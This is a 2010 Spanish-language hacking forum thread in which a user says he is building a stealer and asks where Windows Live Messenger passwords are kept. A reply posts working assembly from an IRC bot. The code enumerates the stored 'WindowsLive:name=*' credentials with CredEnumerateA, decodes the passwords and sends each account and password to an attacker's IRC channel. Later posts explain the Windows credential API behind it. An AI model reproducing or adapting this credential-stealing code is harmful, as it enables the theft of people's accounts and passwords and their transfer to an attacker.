elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.


 


Tema destacado: 4n4lDetector v1.3: herramienta de análisis estático de malware


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Análisis y Diseño de Malware (Moderador: fary)
| | |-+  Archivo de credenciales WLM
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Archivo de credenciales WLM  (Leído 3,487 veces)
chacKos

Desconectado Desconectado

Mensajes: 62


Ver Perfil
Archivo de credenciales WLM
« en: 10 Abril 2010, 18:38 »

Hola estoy intentando saber donde se guardan las contraseñas de WLM para un stealer. Se que las contraseñas se almacenan en el archivo de credenciales, con la entrada  que  comienza con "WindowsLive: nombre =".  pero no se donde está dicho archivo!
Alguien sabe?
En línea



---] chacKos [---
[L]ord [R]NA


Desconectado Desconectado

Mensajes: 1.513


El Dictador y Verdugo de H-Sec


Ver Perfil WWW
Re: Archivo de credenciales WLM
« Respuesta #1 en: 10 Abril 2010, 20:02 »

Trata de buscar antes de poner una pregunta
Código:
http://foro.elhacker.net/analisis_y_diseno_de_malware/source_hirc_bot_v11b-t267445.0.html
En línea

chacKos

Desconectado Desconectado

Mensajes: 62


Ver Perfil
Re: Archivo de credenciales WLM
« Respuesta #2 en: 11 Abril 2010, 11:02 »

Muchas gracias, pero sigo sin saber donde se encuentra lo que busco, no entendí muy bien el código!
En línea



---] chacKos [---
[L]ord [R]NA


Desconectado Desconectado

Mensajes: 1.513


El Dictador y Verdugo de H-Sec


Ver Perfil WWW
Re: Archivo de credenciales WLM
« Respuesta #3 en: 11 Abril 2010, 12:01 »

Esta mas que entendible... movi las variables a la funcion ya que estan agregadas mas abajo por si leiste rapido y no se te ocurrio buscarla.

Código
  1. proc ObtenerCuentasMSN,pSocket,pCanal
  2.  
  3. locals
  4. lCred  dd ?
  5. lCount dd ?
  6. lLibreria dd ?
  7. lBuffer rb 150
  8. lBuffer2 rb 100
  9. lBuffer3 rb 200
  10. creda db "CredEnumerateA",0
  11. Crd db 'WindowsLive:name=*',0
  12. endl
  13.  
  14. stdcall HablarIRC,[pSocket],[pCanal],cLOGO1
  15. stdcall HablarIRC,[pSocket],[pCanal],cLOGO2
  16. stdcall HablarIRC,[pSocket],[pCanal],cLOGO3
  17.  
  18. invoke LoadLibrary,dadvapi32
  19. mov [lLibreria],eax
  20. invoke GetProcAddress,eax,creda
  21.  
  22. stdcall eax,Crd, 0,addr lCount,addr lCred
  23.  
  24. .if [lCount] = 0
  25. stdcall HablarIRC,[pSocket],[pCanal],cNo
  26. jmp .salir
  27. .endif
  28.  
  29. mov ebx,[lCred]
  30. sub ebx,4
  31.  
  32. .bucle_:
  33.  
  34. dec [lCount]
  35. add ebx,4
  36. mov edi,[ebx]
  37. add  dword[edi+8],17
  38.  
  39. .if dword[edi+28]  <> 0
  40.  
  41. invoke wsprintf,addr lBuffer,cCuenta,dword[edi+8]
  42. stdcall UniToAscii,addr lBuffer2,dword[edi+28]                                  ;Aqui queda la clave
  43. invoke wsprintf,addr lBuffer3,cClave,addr lBuffer2
  44. stdcall HablarIRC,[pSocket],[pCanal],addr lBuffer
  45. stdcall HablarIRC,[pSocket],[pCanal],addr lBuffer3
  46.  
  47. .else
  48.  
  49. invoke wsprintf,addr lBuffer,cCuenta,dword[edi+8]
  50. stdcall HablarIRC,[pSocket],[pCanal],addr lBuffer
  51.  
  52. .endif
  53.  
  54. cmp [lCount] ,0
  55. jne  .bucle_
  56.  
  57. .salir:
  58.  
  59. invoke FreeLibrary,[lLibreria]
  60. ret
« Última modificación: 11 Abril 2010, 14:10 por Lord R.N.A. » En línea

chacKos

Desconectado Desconectado

Mensajes: 62


Ver Perfil
Re: Archivo de credenciales WLM
« Respuesta #4 en: 11 Abril 2010, 13:50 »

No te sería más fácil decirme donde se encuentran que ponerme el código ensamblador? Tan solo quiero saber eso! Tengo conocimientos de asm pero tendría que ponerme a probar ese código!
En línea



---] chacKos [---
Arkangel_0x7C5


Desconectado Desconectado

Mensajes: 361



Ver Perfil
Re: Archivo de credenciales WLM
« Respuesta #5 en: 11 Abril 2010, 13:56 »

No te sería más fácil decirme donde se encuentran que ponerme el código ensamblador? Tan solo quiero saber eso! Tengo conocimientos de asm pero tendría que ponerme a probar ese código!

mira el code un poco.

fijate en la parte de las cadenas de texto
Código
  1. creda db "CredEnumerateA",0
  2. Crd db 'WindowsLive:name=*',0
  3.  
En línea

Karcrack


Desconectado Desconectado

Mensajes: 2.425


Se siente observado ¬¬'


Ver Perfil
Re: Archivo de credenciales WLM
« Respuesta #6 en: 11 Abril 2010, 14:00 »

El fichero de credenciales no es en si un fichero...

Tienes que usar las APIs de los Credenciales para acceder, entre ellas CredEnumerate... Busca en la MSDN para mas informacion ;)
En línea

[L]ord [R]NA


Desconectado Desconectado

Mensajes: 1.513


El Dictador y Verdugo de H-Sec


Ver Perfil WWW
Re: Archivo de credenciales WLM
« Respuesta #7 en: 11 Abril 2010, 14:06 »

No te sería más fácil decirme donde se encuentran que ponerme el código ensamblador? Tan solo quiero saber eso! Tengo conocimientos de asm pero tendría que ponerme a probar ese código!

No tendrias que probarlo, simplemente tendrias que analizarlo y ver la parte del codigo que te puse. El problema es que si solo te digo que que debes de usar CredEnumerateA me  pediras un ejemplo ya teniendo uno. Si te soluciono el problema terminaras de hacer lo que estas haciendo es cierto, pero no sabras siquiera como lo hiciste.

"Si das pescado a un hombre hambriento, le nutres una jornada. Si le enseñas a pescar, le nutrirás toda la vida." - Lao Tse
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Spradear Facebook y Credenciales de Twetter IEXPLORER « 1 2 »
Análisis y Diseño de Malware
Jaixon Jax 14 6,681 Último mensaje 24 Noviembre 2010, 18:41
por Jaixon Jax
Robo de credenciales GSSAPI en libcurl
Noticias
wolfbcn 1 1,150 Último mensaje 12 Julio 2011, 18:01
por dimitrix
credenciales
Hacking Avanzado
Alpiskris 1 1,144 Último mensaje 20 Noviembre 2011, 20:02
por Alpiskris
Cifrado de credenciales con HTTP
Seguridad
d3xf4ult 3 1,116 Último mensaje 13 Mayo 2012, 19:00
por raul338
Es ético publicar 10.000 credenciales en un blog? « 1 2 »
Seguridad
m0rf 16 3,275 Último mensaje 28 Mayo 2012, 13:48
por Roboto
Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines